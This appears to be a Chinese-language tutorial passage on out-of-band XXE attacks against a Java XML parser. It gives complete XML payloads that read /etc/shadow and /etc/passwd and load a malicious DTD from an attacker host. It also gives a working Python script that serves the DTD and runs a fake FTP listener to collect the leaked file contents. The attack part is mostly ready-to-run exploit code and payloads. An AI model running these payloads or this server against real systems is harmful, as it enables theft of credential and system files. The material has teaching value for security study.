λ mvn clean package [WARNING] [WARNING] Some problems were encountered while building the effective settings [WARNING] expected START_TAG or END_TAG not TEXT (position: TEXT seen ...</repositories>\n\u3000\u3000\u3000 <!-- \u63d2\u4ef6\u4ed3\u5e93 -->\n <p... @232:9) @ D:\Store\document\all_my_work\java_lib\apache-maven-3.5.0\bin\..\conf\settings.xml, line 232, column 9 [WARNING] [INFO] Scanning for projects... [INFO] [INFO] ------------------------------------------------------------------------ [INFO] Building xxedemo 0.0.1-SNAPSHOT [INFO] ------------------------------------------------------------------------ ... [INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESS [INFO] ------------------------------------------------------------------------ [INFO] Total time: 10.617 s [INFO] Finished at: 2019-01-23T14:19:30+08:00 [INFO] Final Memory: 37M/324M [INFO] ------------------------------------------------------------------------
"""
The XML Payload you should send to the server!

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/shadow">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:8888/evil.dtd">
%dtd;
]>
<data>&send;</data>
"""

# External DTD that WebServer hands out.  The two ``{}`` placeholders are
# filled by ``str.format`` in the main block with this host's public IP and
# the FTP port, so the victim's parser ends up declaring ``send`` as an FTP
# URL whose path is the expansion of ``%file;`` (declared in the request
# above).  The indirection through ``%all;`` is the usual way to get a
# parameter entity substituted inside an entity value, since XML's
# internal-subset rules do not allow doing it directly.
payload = (
    "<!ENTITY % all \"<!ENTITY send SYSTEM 'ftp://{}:{}/%file;'>\"> "
    "%all;"
)
class WebServer(SocketServer.BaseRequestHandler):
    """Minimal HTTP responder that hands out the external DTD.

    One handler instance is created per TCP connection.  Whatever the client
    sends is read once (up to 4 KiB) and logged; the reply is always the same
    ``application/xml`` document built from the module-level ``payload``,
    regardless of request line, path or method.  No client check of any kind
    is performed, so anything that can reach the port gets the DTD and gets
    its bytes written into the log unmodified.
    """

    def handle(self):
        """Log the raw request and answer with the DTD."""
        body = payload
        response = (
            "HTTP/1.1 200 OK\r\n"
            "Content-Type: application/xml\r\n"
            "Content-length: {}\r\n"
            "\r\n"
            "{}\r\n\r\n"
        ).format(len(body), body)
        # The request is never parsed: evil.dtd or any other path is answered
        # the same way.
        self.data = self.request.recv(4096).strip()
        wlog("[WEB] {} Connected and sent:".format(self.client_address[0]))
        wlog("{}".format(self.data))
        self.request.sendall(response)
        wlog("[WEB] Replied with:\n{}".format(response))
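class FTPServer(SocketServer.BaseRequestHandler):
    """Fake FTP control channel that collects the exfiltrated data.

    The victim's parser resolves ``&send;`` to an FTP URL whose path is the
    content of the leaked file, and its FTP client sends that path back to
    us as commands.  Nothing is ever transferred: every command line the
    client sends is logged through ``wlog``, and that log *is* the loot.
    Replies are the minimum needed to keep a Java FTP client talking:
    ``USER`` gets 331, ``LIST`` a one-entry listing, ``PORT`` and ``SYST``
    fixed 2xx codes, and everything else (``PASS``, ``CWD``, ``RETR``, ...)
    a generic 230 so the client keeps sending.

    Notes:
      * The command verb is the first token of the line, not a substring
        match over the whole line, so leaked content that happens to contain
        ``USER``/``PORT``/``LIST``/``SYST`` gets the generic 230 rather than
        a reply that can make the client abort (e.g. a 331 on a ``CWD``).
      * An empty read means the peer closed; the loop ends instead of
        writing 230s into a dead socket until ``sendall`` fails.
      * The timeout check uses ``str(e)`` so it does not depend on the
        exception object being iterable.
      * No client check is performed: anything that can reach the port can
        write arbitrary bytes into the log.
    """

    def handle(self):
        """Serve one FTP control connection until the client goes away."""
        # Give up on stalled clients so a thread is not pinned forever.
        self.request.settimeout(10)
        peer = self.client_address[0]
        wlog("[FTP] {} has connected".format(peer))
        self.request.sendall("220 xxe-ftp-server\n")
        try:
            while True:
                self.data = self.request.recv(4096).strip()
                if not self.data:
                    # EOF: the client closed its side of the connection.
                    break
                # Leaked content reaches wlog byte-for-byte; control
                # characters in the file land in the log as-is.
                wlog("[FTP] Received:\n{}".format(self.data))
                verb = self.data.split(None, 1)[0].upper()
                if verb == "LIST":
                    self.request.sendall("drwxrwxrwx 1 owner group 1 Feb 21 04:37 rsl\n")
                    self.request.sendall("150 Opening BINARY mode data connection for /bin/ls\n")
                    self.request.sendall("226 Transfer complete.\n")
                elif verb == "USER":
                    self.request.sendall("331 password please - version check\n")
                elif verb == "PORT":
                    wlog("[FTP] ! PORT received")
                    wlog("[FTP] > 200 PORT command ok")
                    self.request.sendall("200 PORT command ok\n")
                elif verb == "SYST":
                    self.request.sendall("215 RSL\n")
                else:
                    # PASS, TYPE, CWD, RETR, ... : anything 2xx keeps the
                    # client walking the path segments (the leaked data).
                    wlog("[FTP] > 230 more data please!")
                    self.request.sendall("230 more data please!\n")
        except Exception as e:
            # Boundary handler: log and fall through to the close message;
            # the server thread must survive a misbehaving client.
            if "timed out" in str(e):
                wlog("[FTP] Client timed out")
            else:
                wlog("[FTP] Client error: {}".format(e))
        wlog("[FTP] Connection closed with {}".format(peer))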
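def start_server(conn, serv_class):
    """Bind ``serv_class`` on ``conn`` and serve it from a daemon thread.

    Args:
        conn: ``(host, port)`` tuple to bind.  The main block uses
            ``0.0.0.0`` so the victim can reach the listener from anywhere,
            which also means anyone else on the network can.
        serv_class: a ``SocketServer.BaseRequestHandler`` subclass.

    Returns:
        The running server object, so the caller can ``shutdown()`` /
        ``server_close()`` it.  Callers that ignore the return value (as the
        main block does) are unaffected.

    Raises:
        Whatever ``TCPServer`` raises when the bind fails (typically a
        socket error for an address already in use).
    """
    import os

    server = SocketServer.TCPServer(conn, serv_class, bind_and_activate=False)
    # SO_REUSEADDR must be set before bind.  Without it a restart right after
    # Ctrl-C fails with "Address already in use" while the port is in
    # TIME_WAIT.  On Windows SO_REUSEADDR instead lets another process bind
    # the same port, so it is left off there.
    server.allow_reuse_address = os.name != "nt"
    try:
        server.server_bind()
        server.server_activate()
    except Exception:
        server.server_close()
        raise
    worker = Thread(target=server.serve_forever)
    # Daemon thread: the process exits on Ctrl-C without joining the server.
    worker.daemon = True
    worker.start()
    return server


if __name__ == "__main__":
    # The public IP is baked into the DTD as the FTP host; the victim's
    # parser must be able to route to it, otherwise no data ever arrives.
    # Check the length first so a missing argument gives the message instead
    # of an IndexError.
    if len(argv) < 2 or not argv[1]:
        print("[-] Need public IP of this server in order to receive data.")
        exit(1)
    WEB_ARGS = ("0.0.0.0", 8888)
    FTP_ARGS = ("0.0.0.0", 2121)
    payload = payload.format(argv[1], FTP_ARGS[1])
    wlog("[WEB] Starting webserver on %s:%d..." % WEB_ARGS)
    start_server(WEB_ARGS, WebServer)
    wlog("[FTP] Starting FTP server on %s:%d..." % FTP_ARGS)
    start_server(FTP_ARGS, FTPServer)
    try:
        # Both servers run on daemon threads; park the main thread until
        # Ctrl-C.
        while True:
            sleep(10000)
    except KeyboardInterrupt:
        print("\n[+] Server shutting down.")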
运行:
$ python xxeftp.py 127.0.0.1 [WEB] Starting webserver on 0.0.0.0:8888... [FTP] Starting FTP server on 0.0.0.0:2121...
发送 payload，这次我们读取 /etc/passwd（注意：这种 FTP 外带方式依赖目标的 JDK 版本——较新的 JDK 可能会拒绝 FTP URL 中的换行符，多行文件可能只能取回第一行或直接失败）：
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!-- %file: the local file to leak; its contents become the path of the
     FTP URL declared by the external DTD -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- %dtd: fetched from xxeftp.py's web server on port 8888; that DTD
     declares "send" as ftp://IP:2121/%file; -->
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd">
%dtd;
]>
<!-- Referencing &send; makes the parser open the FTP URL, and the FTP
     commands it sends carry the file content to the listener -->
<data>&send;</data>